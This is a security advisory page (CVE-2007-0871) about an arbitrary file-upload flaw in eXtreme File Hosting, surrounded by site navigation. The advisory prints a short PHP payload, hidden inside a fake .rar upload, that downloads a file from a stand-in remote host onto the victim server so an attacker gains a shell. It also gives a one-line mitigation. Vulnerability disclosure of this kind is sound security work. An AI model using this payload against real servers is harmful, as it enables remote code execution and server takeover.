|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 2231 CVE : CVE-2007-0871 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : hamed bazargani Published : 13.02.2007
Advisory Content : A security bug have been discovered in eXtreme File Hosting, which can be upload the attaker files and can get the shell with phpshell. bug : in this borgram with php can user upload zip or rar file hacker can upload the a.php.rar file that contain ########################### <?php $file = 'http://sample.com/evile_file.php'; $newfile = 'evile_file.php'; if (!copy($file, $newfile)) { echo "failed to copy $file...n"; }else{ echo "OK file copy in victim host"; } ?> ########################### and upload it the click in download link then this file run and dont download after run a.php.rar the evile_file.php copy in victim host and attacker can use for hacking server. Solution: disable rar file uploading in setting Underlying OS: Linux (Any), UNIX (Any), Windows (Any) software: eXtreme File Hosting site: http://www.extremepow.com Reported By: : hamed bazargani (hamed.bazargani (at) gmail (dot) com [email concealed]) From I.R.IRAN and all iranian whitehat hacker  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libopie __readrec() off-by-one
This advisory is related to new FreeBSD advisory FreeBSD-SA-10:05.opie. |
||
| Apache |  |
|
» Apache ActiveMQ 5.4.0 |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2010-04-23| Copyright © SecurityReason.com. All Rights Reserved. |